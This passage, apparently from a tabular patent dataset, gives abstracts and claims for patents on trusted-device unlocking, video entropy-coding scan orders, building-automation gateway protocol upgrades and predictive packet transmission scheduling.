scanning for availability of a trusted device; based on the scan, identifying a particular trusted device; sending a request for the particular trusted device to a proxy device that sends a request to the particular trusted device; and establishing a communication connection with the particular trusted device. 25. The non-transitory machine readable medium of claim 24, wherein the sets of instructions for scanning, sending, and exchanging are performed using a first wireless protocol, wherein the communication connection is established to use a different, second wireless protocol. 26. The non-transitory machine readable medium of claim 24, wherein upon receiving the request, the proxy device instructs the particular trusted device to initiate a broadcast of its availability. 27. The non-transitory machine readable medium of claim 24, wherein the proxy device is in a locked state and the trusted device is in an unlocked state. 28. The non-transitory machine readable medium of claim 24, wherein the set of instructions for establishing the communication connection comprises a set of instructions for exchanging bootstrap information with the particular trusted device, wherein the bootstrap information identifies a portion of a frequency spectrum for the communication connection. 29. The non-transitory machine readable medium of claim 24, wherein the program further comprises sets of instructions for:
receiving input to initiate a change in security state at the target device; using the established communication connection to perform a set of ranging operations to allow the target device to receive a set of authentication information; and using the set of authentication information to change the security state at the target device. 30. The non-transitory machine readable medium of claim 29, wherein the change in security state moves the target device from a locked state to an unlocked state. 31. The non-transitory machine readable medium of claim 24, wherein the target device is allowed to receive the set of authentication information when the trusted device is determined to be within a particular threshold distance based on the set of ranging operations. 32. The non-transitory machine readable medium of claim 24, wherein the trusted device sends the set of authentication information when the target device is determined to be within a particular threshold distance based on the set of ranging operations. | 2,400 |
9,134 | 9,134 | 15,671,595 | 2,485 | Systems and methods are disclosed for entropy coding of blocks of image data. For example, methods may include partitioning a block of video data into a plurality of groups of elements; decoding, using an entropy decoder, data from an encoded bitstream to obtain, using a first scan order, elements of a first group from the plurality of groups of elements, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row and elements of a first column of the block; determining, based on the elements of the first group, a second scan order for a second group from the plurality of groups of elements; and decoding, using the entropy decoder, data from the encoded bitstream to obtain, using the second scan order, elements of the second group from the plurality of groups of elements. | 1. A system for decoding video, comprising:
a memory; and a processor, wherein the memory stores instructions executable by the processor to cause the system to:
partition a block of video data into a plurality of groups of elements;
decode, using an entropy decoder, data from an encoded bitstream to obtain, using a first scan order, elements of a first group from the plurality of groups of elements, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block;
determine, based on the elements of the first group, a second scan order for a second group from the plurality of groups of elements; and
decode, using the entropy decoder, data from the encoded bitstream to obtain, using the second scan order, elements of the second group from the plurality of groups of elements. 2. The system of claim 1, wherein the elements of the block are quantized transform coefficients. 3. The system of claim 1, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 4. The system of claim 1, wherein a shape of the first group is selected based on a size of the block. 5. The system of claim 1, wherein the memory stores instructions executable by the processor to cause the system to:
determine a sum of magnitudes of all the elements of the first group; check a parity of the sum; and enable use of the second scan order based on the parity of the sum. 6. The system of claim 1, wherein the instructions for determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements include instructions executable by the processor to cause the system to:
determine a scan order prediction based on the elements of the first group; decode, using the entropy decoder, data from the encoded bitstream to obtain a scan order adjustment parameter; and determine the second scan order based on the scan order prediction and the scan order adjustment parameter. 7. The system of claim 1, wherein the instructions for determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements include instructions executable by the processor to cause the system to:
determine a first count of non-zero elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second count of non-zero elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the second scan order based on the first count and the second count. 8. The system of claim 1, wherein the instructions for determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements include instructions executable by the processor to cause the system to:
determine a first sum of magnitudes of elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second sum of magnitudes of elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the second scan order based on the first sum and the second sum. 9. A method for decoding video comprising:
partitioning a block of video data into a plurality of groups of elements; decoding, using an entropy decoder, data from an encoded bitstream to obtain, using a first scan order, elements of a first group from the plurality of groups of elements, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block; determining, based on the elements of the first group, a second scan order for a second group from the plurality of groups of elements; and decoding, using the entropy decoder, data from the encoded bitstream to obtain, using the second scan order, elements of the second group from the plurality of groups of elements. 10. The method of claim 9, wherein the elements of the block are quantized transform coefficients. 11. The method of claim 9, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 12. The method of claim 9, comprising:
determining a sum of magnitudes of all the elements of the first group; checking a parity of the sum; and enabling use of the second scan order based on the parity of the sum. 13. The method of claim 9, wherein determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements comprises:
determining a scan order prediction based on the elements of the first group; decoding, using the entropy decoder, data from the encoded bitstream to obtain a scan order adjustment parameter; and determining the second scan order based on the scan order prediction and the scan order adjustment parameter. 14. The method of claim 9, wherein determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements comprises:
determining a first count of non-zero elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determining a second count of non-zero elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determining the second scan order based on the first count and the second count. 15. The method of claim 9, wherein determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements comprises:
determining a first sum of magnitudes of elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determining a second sum of magnitudes of elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determining the second scan order based on the first sum and the second sum. 16. A system for encoding video, comprising:
a memory; and a processor, wherein the memory stores instructions executable by the processor to cause the system to:
partition a block of video data into a plurality of groups of elements;
encode, using an entropy encoder using a first scan order, elements of a first group from the plurality of groups of elements, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block;
determine, based on the elements of the first group, a second scan order for a second group from the plurality of groups of elements; and
encode, using the entropy encoder using the second scan order, elements of the second group from the plurality of groups of elements. 17. The system of claim 16, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 18. The system of claim 16, wherein the memory stores instructions executable by the processor to cause the system to:
determine a sum of magnitudes of all the elements of the first group; check a parity of the sum; and adjust an element of the first group to change the parity of the sum to signal that use of the second scan order is enabled. 19. The system of claim 16, wherein the memory stores instructions executable by the processor to cause the system to:
determine a scan order prediction based on the elements of the first group; and encode, using the entropy encoder, a scan order adjustment parameter that is based on the second scan order and the scan order prediction. 20. The system of claim 16, wherein the instructions for determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements include instructions executable by the processor to cause the system to:
determine a first count of non-zero elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second count of non-zero elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the second scan order based on the first count and the second count. | Systems and methods are disclosed for entropy coding of blocks of image data. For example, methods may include partitioning a block of video data into a plurality of groups of elements; decoding, using an entropy decoder, data from an encoded bitstream to obtain, using a first scan order, elements of a first group from the plurality of groups of elements, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row and elements of a first column of the block; determining, based on the elements of the first group, a second scan order for a second group from the plurality of groups of elements; and decoding, using the entropy decoder, data from the encoded bitstream to obtain, using the second scan order, elements of the second group from the plurality of groups of elements.1. A system for decoding video, comprising:
a memory; and a processor, wherein the memory stores instructions executable by the processor to cause the system to:
partition a block of video data into a plurality of groups of elements;
decode, using an entropy decoder, data from an encoded bitstream to obtain, using a first scan order, elements of a first group from the plurality of groups of elements, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block;
determine, based on the elements of the first group, a second scan order for a second group from the plurality of groups of elements; and
decode, using the entropy decoder, data from the encoded bitstream to obtain, using the second scan order, elements of the second group from the plurality of groups of elements. 2. The system of claim 1, wherein the elements of the block are quantized transform coefficients. 3. The system of claim 1, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 4. The system of claim 1, wherein a shape of the first group is selected based on a size of the block. 5. The system of claim 1, wherein the memory stores instructions executable by the processor to cause the system to:
determine a sum of magnitudes of all the elements of the first group; check a parity of the sum; and enable use of the second scan order based on the parity of the sum. 6. The system of claim 1, wherein the instructions for determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements include instructions executable by the processor to cause the system to:
determine a scan order prediction based on the elements of the first group; decode, using the entropy decoder, data from the encoded bitstream to obtain a scan order adjustment parameter; and determine the second scan order based on the scan order prediction and the scan order adjustment parameter. 7. The system of claim 1, wherein the instructions for determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements include instructions executable by the processor to cause the system to:
determine a first count of non-zero elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second count of non-zero elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the second scan order based on the first count and the second count. 8. The system of claim 1, wherein the instructions for determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements include instructions executable by the processor to cause the system to:
determine a first sum of magnitudes of elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second sum of magnitudes of elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the second scan order based on the first sum and the second sum. 9. A method for decoding video comprising:
partitioning a block of video data into a plurality of groups of elements; decoding, using an entropy decoder, data from an encoded bitstream to obtain, using a first scan order, elements of a first group from the plurality of groups of elements, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block; determining, based on the elements of the first group, a second scan order for a second group from the plurality of groups of elements; and decoding, using the entropy decoder, data from the encoded bitstream to obtain, using the second scan order, elements of the second group from the plurality of groups of elements. 10. The method of claim 9, wherein the elements of the block are quantized transform coefficients. 11. The method of claim 9, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 12. The method of claim 9, comprising:
determining a sum of magnitudes of all the elements of the first group; checking a parity of the sum; and enabling use of the second scan order based on the parity of the sum. 13. The method of claim 9, wherein determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements comprises:
determining a scan order prediction based on the elements of the first group; decoding, using the entropy decoder, data from the encoded bitstream to obtain a scan order adjustment parameter; and determining the second scan order based on the scan order prediction and the scan order adjustment parameter. 14. The method of claim 9, wherein determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements comprises:
determining a first count of non-zero elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determining a second count of non-zero elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determining the second scan order based on the first count and the second count. 15. The method of claim 9, wherein determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements comprises:
determining a first sum of magnitudes of elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determining a second sum of magnitudes of elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determining the second scan order based on the first sum and the second sum. 16. A system for encoding video, comprising:
a memory; and a processor, wherein the memory stores instructions executable by the processor to cause the system to:
partition a block of video data into a plurality of groups of elements;
encode, using an entropy encoder using a first scan order, elements of a first group from the plurality of groups of elements, wherein the first group includes elements forming a triangle in a corner of the block, and wherein the triangle includes elements of a first row of the block and elements of a first column of the block;
determine, based on the elements of the first group, a second scan order for a second group from the plurality of groups of elements; and
encode, using the entropy encoder using the second scan order, elements of the second group from the plurality of groups of elements. 17. The system of claim 16, wherein the first group includes elements of a first row of the block that are outside of the triangle and elements of a first column of the block that are outside of the triangle. 18. The system of claim 16, wherein the memory stores instructions executable by the processor to cause the system to:
determine a sum of magnitudes of all the elements of the first group; check a parity of the sum; and adjust an element of the first group to change the parity of the sum to signal that use of the second scan order is enabled. 19. The system of claim 16, wherein the memory stores instructions executable by the processor to cause the system to:
determine a scan order prediction based on the elements of the first group; and encode, using the entropy encoder, a scan order adjustment parameter that is based on the second scan order and the scan order prediction. 20. The system of claim 16, wherein the instructions for determining, based on the elements of the first group, the second scan order for the second group from the plurality of groups of elements include instructions executable by the processor to cause the system to:
determine a first count of non-zero elements in a portion of the first group below a main diagonal of the block and at or above an anti-diagonal of the block; determine a second count of non-zero elements in a portion of the first group above the main diagonal of the block and at or above the anti-diagonal of the block; and determine the second scan order based on the first count and the second count. | 2,400 |
9,135 | 9,135 | 15,983,144 | 2,444 | A method for managing communication with a building automation device, the method being performed in a gateway, the method including the steps of: establishing communication with the building automation device over a first communication protocol; installing executable software instructions on the building automation device over the first communication protocol to provide a capability to communicate over a second communication protocol; and establishing communication with the building automation device over the second communication protocol. | 1. A method for managing communication with a building automation device, the method being performed in a gateway and comprising the steps of:
establishing communication with the building automation device over a first communication protocol; installing executable software instructions on the building automation device over the first communication protocol to provide a capability to communicate over a second communication protocol; and establishing communication with the building automation device over the second communication protocol. 2. The method according to claim 1, wherein the first communication protocol and the second communication protocol comprise media access control (MAC) level protocols. 3. The method according to claim 1, wherein the first communication protocol and the second communication protocol comprise physical level protocols. 4. The method according to claim 1, wherein the first communication protocol and the second communication protocol are both selected from the group consisting of 6L0WPAN, IPv6 over Low power Wireless Personal Area Networks, IEEE 802.15.4, ZigBee, Thread, Bluetooth, Bluetooth Low Energy, Digital Enhanced Cordless Telecommunications Ultra Low Energy, DECT ULE, and EnOcean. 5. The method according to claim 1, wherein the second communication protocol comprises a later revision of the first communication protocol. 6. A gateway for managing communication with a building automation device, the gateway comprising:
a processor; and a memory configured to store instructions that, when executed by the processor, are configured to cause the gateway to: establish communication with the building automation device over a first communication protocol; install executable software instructions on the building automation device over the first communication protocol to provide a capability to communicate over a second communication protocol; and establish communication with the building automation device over the second communication protocol. 7. The gateway according to claim 6, wherein the first communication protocol and the second communication protocol comprise media access control (MAC) level protocols. 8. The gateway according to claim 6, wherein the first communication protocol and the second communication protocol comprise physical level protocols. 9. The gateway according to claim 6, wherein the first communication protocol and the second communication protocol are both selected from the group consisting of 6L0WPAN, IPv6 over Low power Wireless Personal Area Networks, IEEE 802.15.4, ZigBee, Thread, Bluetooth, Bluetooth Low Energy, Digital Enhanced Cordless Telecommunications Ultra Low Energy, DECT ULE, and EnOcean. 10. The gateway according to claim 6, wherein the second communication protocol comprises a later revision of the first communication protocol. 11. A computer program for managing communication with a building automation device, the computer program comprising computer program code which, when run on a gateway is configured to cause the gateway to:
establish communication with the building automation device over a first communication protocol; install executable software instructions on the building automation device over the first communication protocol to provide a capability to communicate over a second communication protocol; and establish communication with the building automation device over the second communication protocol. 12. A computer program product comprising the computer program according to claim 11 and a computer readable medium on which the computer program is stored. 13. A method for managing communication with a gateway, the method being performed in a building automation device and comprising the steps of:
establishing communication with the gateway over a first communication protocol; receiving, from the gateway over the first communication protocol, a command to install a capability to communicate over a second communication protocol; receiving executable software instructions configured for communication over the second communication protocol; installing the executable software instructions to provide the capability to communicate over the second communication protocol; and establishing communication with the gateway over the second communication protocol. 14. The method according to claim 13, further comprising the step of:
accepting communication over the first communication protocol for a predetermined duration when the building automation device is powered on. 15. A building automation device for managing communication with a gateway, the building automation device comprising:
a processor; and a memory storing instructions that, when executed by the processor, are configured to cause the building automation device to:
establish communication with the gateway over a first communication protocol;
receive, from the gateway over the first communication protocol, a command to install a capability to communicate over a second communication protocol;
receive executable software instructions to be used for communication over the second communication protocol;
install the executable software instructions to provide the capability to communicate over the second communication protocol; and
establish communication with the gateway over the second communication protocol. 16. The building automation device according to claim 15, further comprising instructions that, when executed by the processor, are configured to cause the building automation device to:
accept communication over the first communication protocol for a predetermined duration when the building automation device is powered on. 17. A computer program for managing communication with a gateway, the computer program comprising computer program code which, when run on a building automation device is configured to cause the building automation device to:
establish communication with the gateway over a first communication protocol; receive, from the gateway over the first communication protocol, a command to install a capability to communicate over a second communication protocol; receive executable software instructions required for communication over the second communication protocol; install the executable software instructions to provide the capability to communicate over the second communication protocol; and establish communication with the gateway over the second communication protocol. 18. A computer program product comprising the computer program according to claim 17 and a computer readable medium on which the computer program is stored. | A method for managing communication with a building automation device, the method being performed in a gateway, the method including the steps of: establishing communication with the building automation device over a first communication protocol; installing executable software instructions on the building automation device over the first communication protocol to provide a capability to communicate over a second communication protocol; and establishing communication with the building automation device over the second communication protocol.1. A method for managing communication with a building automation device, the method being performed in a gateway and comprising the steps of:
establishing communication with the building automation device over a first communication protocol; installing executable software instructions on the building automation device over the first communication protocol to provide a capability to communicate over a second communication protocol; and establishing communication with the building automation device over the second communication protocol. 2. The method according to claim 1, wherein the first communication protocol and the second communication protocol comprise media access control (MAC) level protocols. 3. The method according to claim 1, wherein the first communication protocol and the second communication protocol comprise physical level protocols. 4. The method according to claim 1, wherein the first communication protocol and the second communication protocol are both selected from the group consisting of 6L0WPAN, IPv6 over Low power Wireless Personal Area Networks, IEEE 802.15.4, ZigBee, Thread, Bluetooth, Bluetooth Low Energy, Digital Enhanced Cordless Telecommunications Ultra Low Energy, DECT ULE, and EnOcean. 5. The method according to claim 1, wherein the second communication protocol comprises a later revision of the first communication protocol. 6. A gateway for managing communication with a building automation device, the gateway comprising:
a processor; and a memory configured to store instructions that, when executed by the processor, are configured to cause the gateway to: establish communication with the building automation device over a first communication protocol; install executable software instructions on the building automation device over the first communication protocol to provide a capability to communicate over a second communication protocol; and establish communication with the building automation device over the second communication protocol. 7. The gateway according to claim 6, wherein the first communication protocol and the second communication protocol comprise media access control (MAC) level protocols. 8. The gateway according to claim 6, wherein the first communication protocol and the second communication protocol comprise physical level protocols. 9. The gateway according to claim 6, wherein the first communication protocol and the second communication protocol are both selected from the group consisting of 6L0WPAN, IPv6 over Low power Wireless Personal Area Networks, IEEE 802.15.4, ZigBee, Thread, Bluetooth, Bluetooth Low Energy, Digital Enhanced Cordless Telecommunications Ultra Low Energy, DECT ULE, and EnOcean. 10. The gateway according to claim 6, wherein the second communication protocol comprises a later revision of the first communication protocol. 11. A computer program for managing communication with a building automation device, the computer program comprising computer program code which, when run on a gateway is configured to cause the gateway to:
establish communication with the building automation device over a first communication protocol; install executable software instructions on the building automation device over the first communication protocol to provide a capability to communicate over a second communication protocol; and establish communication with the building automation device over the second communication protocol. 12. A computer program product comprising the computer program according to claim 11 and a computer readable medium on which the computer program is stored. 13. A method for managing communication with a gateway, the method being performed in a building automation device and comprising the steps of:
establishing communication with the gateway over a first communication protocol; receiving, from the gateway over the first communication protocol, a command to install a capability to communicate over a second communication protocol; receiving executable software instructions configured for communication over the second communication protocol; installing the executable software instructions to provide the capability to communicate over the second communication protocol; and establishing communication with the gateway over the second communication protocol. 14. The method according to claim 13, further comprising the step of:
accepting communication over the first communication protocol for a predetermined duration when the building automation device is powered on. 15. A building automation device for managing communication with a gateway, the building automation device comprising:
a processor; and a memory storing instructions that, when executed by the processor, are configured to cause the building automation device to:
establish communication with the gateway over a first communication protocol;
receive, from the gateway over the first communication protocol, a command to install a capability to communicate over a second communication protocol;
receive executable software instructions to be used for communication over the second communication protocol;
install the executable software instructions to provide the capability to communicate over the second communication protocol; and
establish communication with the gateway over the second communication protocol. 16. The building automation device according to claim 15, further comprising instructions that, when executed by the processor, are configured to cause the building automation device to:
accept communication over the first communication protocol for a predetermined duration when the building automation device is powered on. 17. A computer program for managing communication with a gateway, the computer program comprising computer program code which, when run on a building automation device is configured to cause the building automation device to:
establish communication with the gateway over a first communication protocol; receive, from the gateway over the first communication protocol, a command to install a capability to communicate over a second communication protocol; receive executable software instructions required for communication over the second communication protocol; install the executable software instructions to provide the capability to communicate over the second communication protocol; and establish communication with the gateway over the second communication protocol. 18. A computer program product comprising the computer program according to claim 17 and a computer readable medium on which the computer program is stored. | 2,400 |
9,136 | 9,136 | 15,473,785 | 2,467 | A system, communication device, and method for scheduling transmissions from the communication device. The device predicts an arrival time of a next packet for transmission when a current packet arrives in a transmission buffer. The device plans a future transmission time of the next packet based on the predicted arrival time of the next packet, and books transmission resources for the planned future transmission time. If the next packet has arrived a Tdrop time period before the planned future transmission time, the device transmits the next packet. If the next packet has not arrived at that time, the device re-plans the future transmission time of the next packet. The device may then unbook the transmission resources for the planned future transmission time, book transmission resources for the re-planned future transmission time, and notify other communication devices that the unbooked transmission resources are available for use by the other communication devices. | 1. A method of scheduling transmissions from a communication device, the method comprising:
predicting an arrival time of a next packet for transmission when or after a current packet arrives; planning a future transmission time of the next packet based on the predicted arrival time of the next packet; and booking transmission resources for the planned future transmission time of the next packet. 2. The method according to claim 1, wherein predicting includes predicting the arrival time of the next packet for transmission based on arrival times of N most recently received packets. 3. The method according to claim 1, wherein planning a future transmission time of the next packet includes utilizing a planning method selected from a group consisting of:
computing the future transmission time as a function of the predicted arrival time of the next packet alone; computing the future transmission time as a function of the predicted arrival time of the next packet plus a parameter providing a minimum time between the arrival time of the next packet and the actual transmission of the next packet; computing the future transmission time as a function of the predicted arrival time of the next packet and the current time; and computing the future transmission time as a function of the predicted arrival time of the next packet and the transmission time of the current packet. 4. The method according to claim 1, further comprising:
determining whether the next packet has arrived before the planned future transmission time of the next packet; and transmitting the next packet in response to determining that the next packet has arrived before the planned future transmission time of the next packet. 5. The method according to claim 4, further comprising:
re-planning the future transmission time of the next packet in response to determining that the next packet has not arrived before the planned future transmission time of the next packet. 6. The method according to claim 1, further comprising:
determining whether the next packet has arrived before a defined time period (Tdrop) prior to the planned future transmission time; and transmitting the next packet in response to determining that the next packet has arrived before the Tdrop time period prior to the planned future transmission time of the next packet. 7. The method according to claim 6, further comprising, in response to determining that the next packet has not arrived before the Tdrop time period prior to the planned future transmission time of the next packet:
re-planning the future transmission time of the next packet; unbooking the transmission resources for the planned future transmission time of the next packet; and booking transmission resources for the re-planned future transmission time of the next packet. 8. The method according to claim 7, further comprising notifying other communication devices that the unbooked transmission resources are available for use by the other communication devices. 9. The method according to claim 8, wherein notifying includes sending a control information packet at least the Tdrop time period before the planned future transmission time, the control information packet including:
an indicator for booking transmission resources for the re-planned future transmission time of the next packet; an indicator for informing the other communication devices that the communication device will not use the booked transmission resources for the planned future transmission time of the next packet; and a value indicating the planned future transmission time of the unbooked transmission resources. 10. The method according to claim 1, wherein the communication device is a wireless communication device. 11. A communication device, comprising:
a processor; a non-transitory memory for storing instructions executable by the processor; a transmit buffer connected to the processor; and an interface connected to the processor for transmitting packets from the communication device; wherein, when or after a current packet arrives in the transmit buffer, the processor is configured to execute the instructions in the memory, thereby causing the processor to:
predict an arrival time of a next packet for transmission;
plan a future transmission time of the next packet based on the predicted arrival time of the next packet; and
book transmission resources for the planned future transmission time of the next packet. 12. The communication device according to claim 11, wherein the processor is configured to predict the arrival time of the next packet for transmission based on arrival times of N most recently received packets. 13. The communication device according to claim 11, wherein the processor is configured to plan a future transmission time of the next packet utilizing a planning method selected from a group consisting of:
computing the future transmission time as a function of the predicted arrival time of the next packet alone; computing the future transmission time as a function of the predicted arrival time of the next packet plus a parameter providing a minimum time between the arrival time of the next packet and the actual transmission of the next packet; computing the future transmission time as a function of the predicted arrival time of the next packet and the current time; and computing the future transmission time as a function of the predicted arrival time of the next packet and the transmission time of the current packet. 14. The communication device according to claim 11, wherein the processor is further configured to:
determine whether the next packet has arrived before a defined time period (Tdrop) prior to the planned future transmission time; and transmit the next packet in response to determining that the next packet has arrived before the Tdrop time period prior to the planned future transmission time of the next packet. 15. The communication device according to claim 14, wherein, in response to determining that the next packet has not arrived before the Tdrop time period prior to the planned future transmission time of the next packet, the processor is further configured to:
re-plan the future transmission time of the next packet; unbook the transmission resources for the planned future transmission time of the next packet; and book transmission resources for the re-planned future transmission time of the next packet. 16. The communication device according to claim 15, wherein the processor is further configured to notify other communication devices that the unbooked transmission resources are available for use by the other communication devices. 17. The communication device according to claim 16, wherein the processor is configured to notify the other communication devices by sending a control information packet at least the Tdrop time period before the planned future transmission time, the control information packet including:
an indicator for booking transmission resources for the re-planned future transmission time of the next packet; an indicator for informing the other communication devices that the communication device will not use the booked transmission resources for the planned future transmission time of the next packet; and a value indicating the planned future transmission time of the unbooked transmission resources. 18. The communication device according to claim 11, wherein the communication device is a wireless communication device. 19. A system for scheduling transmissions from a plurality of communication devices involved in a communication using a shared medium, the system comprising:
within each of the plurality of communication devices, an apparatus comprising:
a processor;
a non-transitory memory for storing instructions executable by the processor and for buffering packets to be transmitted; and
an interface connected to the processor for transmitting packets from the communication device;
wherein, when or after a current packet arrives in the memory, the processor is configured to execute the instructions in the memory, thereby causing the processor to:
predict an arrival time of a next packet for transmission;
plan a future transmission time of the next packet based on the predicted arrival time of the next packet;
book transmission resources for the planned future transmission time of the next packet; and
notify other communication devices of the booked transmission resources. 20. The system according to claim 19, wherein the processor within each of the plurality of communication devices is further configured to predict the arrival time of the next packet for transmission based on arrival times of N most recently received packets. 21. The system according to claim 19, wherein the processor within each of the plurality of communication devices is further configured to plan a future transmission time of the next packet utilizing a planning method selected from a group consisting of:
computing the future transmission time as a function of the predicted arrival time of the next packet alone; computing the future transmission time as a function of the predicted arrival time of the next packet plus a parameter providing a minimum time between the arrival time of the next packet and the actual transmission of the next packet; computing the future transmission time as a function of the predicted arrival time of the next packet and the current time; and computing the future transmission time as a function of the predicted arrival time of the next packet and the transmission time of the current packet. 22. The system according to claim 19, wherein the processor within each of the other communication devices is further configured to avoid transmitting at the planned future transmission time. 23. The system according to claim 19, wherein the processor within each of the plurality of communication devices is further configured to:
determine whether the next packet has arrived before a defined time period (Tdrop) prior to the planned future transmission time; and transmit the next packet in response to determining that the next packet has arrived before the Tdrop time period prior to the planned future transmission time of the next packet. 24. The system according to claim 23, wherein, in response to determining that the next packet has not arrived before the Tdrop time period prior to the planned future transmission time of the next packet, the processor within each of the plurality of communication devices is further configured to:
re-plan the future transmission time of the next packet; unbook the transmission resources for the planned future transmission time of the next packet; and book transmission resources for the re-planned future transmission time of the next packet. 25. The system according to claim 24, wherein the processor within each of the plurality of communication devices is further configured to notify the other communication devices that the unbooked transmission resources are available for use by the other communication devices. 26. The system according to claim 25, wherein the processor within each of the plurality of communication devices is configured to notify the other communication devices by sending a control information packet at least the Tdrop time period before the planned future transmission time, the control information packet including:
an indicator for booking transmission resources for the re-planned future transmission time of the next packet; an indicator for informing the other communication devices that the communication device will not use the booked transmission resources for the planned future transmission time of the next packet; and a value indicating the planned future transmission time of the unbooked transmission resources. 27. The system according to claim 19, wherein the plurality of communication devices are wireless communication devices. 28. A communication device within a plurality of communication devices involved in a communication using a shared medium, the communication device comprising:
a processor; a non-transitory memory for storing instructions executable by the processor; and an interface connected to the processor for communicating with other communication devices within the plurality of communication devices; wherein, the processor is configured to execute the instructions in the memory, thereby causing the processor to:
receive information about a planned transmission time by another communication device within the plurality of communication devices; and
avoid transmitting at the planned transmission time. | A system, communication device, and method for scheduling transmissions from the communication device. The device predicts an arrival time of a next packet for transmission when a current packet arrives in a transmission buffer. The device plans a future transmission time of the next packet based on the predicted arrival time of the next packet, and books transmission resources for the planned future transmission time. If the next packet has arrived a Tdrop time period before the planned future transmission time, the device transmits the next packet. If the next packet has not arrived at that time, the device re-plans the future transmission time of the next packet. The device may then unbook the transmission resources for the planned future transmission time, book transmission resources for the re-planned future transmission time, and notify other communication devices that the unbooked transmission resources are available for use by the other communication devices.1. A method of scheduling transmissions from a communication device, the method comprising:
predicting an arrival time of a next packet for transmission when or after a current packet arrives; planning a future transmission time of the next packet based on the predicted arrival time of the next packet; and booking transmission resources for the planned future transmission time of the next packet. 2. The method according to claim 1, wherein predicting includes predicting the arrival time of the next packet for transmission based on arrival times of N most recently received packets. 3. The method according to claim 1, wherein planning a future transmission time of the next packet includes utilizing a planning method selected from a group consisting of:
computing the future transmission time as a function of the predicted arrival time of the next packet alone; computing the future transmission time as a function of the predicted arrival time of the next packet plus a parameter providing a minimum time between the arrival time of the next packet and the actual transmission of the next packet; computing the future transmission time as a function of the predicted arrival time of the next packet and the current time; and computing the future transmission time as a function of the predicted arrival time of the next packet and the transmission time of the current packet. 4. The method according to claim 1, further comprising:
determining whether the next packet has arrived before the planned future transmission time of the next packet; and transmitting the next packet in response to determining that the next packet has arrived before the planned future transmission time of the next packet. 5. The method according to claim 4, further comprising:
re-planning the future transmission time of the next packet in response to determining that the next packet has not arrived before the planned future transmission time of the next packet. 6. The method according to claim 1, further comprising:
determining whether the next packet has arrived before a defined time period (Tdrop) prior to the planned future transmission time; and transmitting the next packet in response to determining that the next packet has arrived before the Tdrop time period prior to the planned future transmission time of the next packet. 7. The method according to claim 6, further comprising, in response to determining that the next packet has not arrived before the Tdrop time period prior to the planned future transmission time of the next packet:
re-planning the future transmission time of the next packet; unbooking the transmission resources for the planned future transmission time of the next packet; and booking transmission resources for the re-planned future transmission time of the next packet. 8. The method according to claim 7, further comprising notifying other communication devices that the unbooked transmission resources are available for use by the other communication devices. 9. The method according to claim 8, wherein notifying includes sending a control information packet at least the Tdrop time period before the planned future transmission time, the control information packet including:
an indicator for booking transmission resources for the re-planned future transmission time of the next packet; an indicator for informing the other communication devices that the communication device will not use the booked transmission resources for the planned future transmission time of the next packet; and a value indicating the planned future transmission time of the unbooked transmission resources. 10. The method according to claim 1, wherein the communication device is a wireless communication device. 11. A communication device, comprising:
a processor; a non-transitory memory for storing instructions executable by the processor; a transmit buffer connected to the processor; and an interface connected to the processor for transmitting packets from the communication device; wherein, when or after a current packet arrives in the transmit buffer, the processor is configured to execute the instructions in the memory, thereby causing the processor to:
predict an arrival time of a next packet for transmission;
plan a future transmission time of the next packet based on the predicted arrival time of the next packet; and
book transmission resources for the planned future transmission time of the next packet. 12. The communication device according to claim 11, wherein the processor is configured to predict the arrival time of the next packet for transmission based on arrival times of N most recently received packets. 13. The communication device according to claim 11, wherein the processor is configured to plan a future transmission time of the next packet utilizing a planning method selected from a group consisting of:
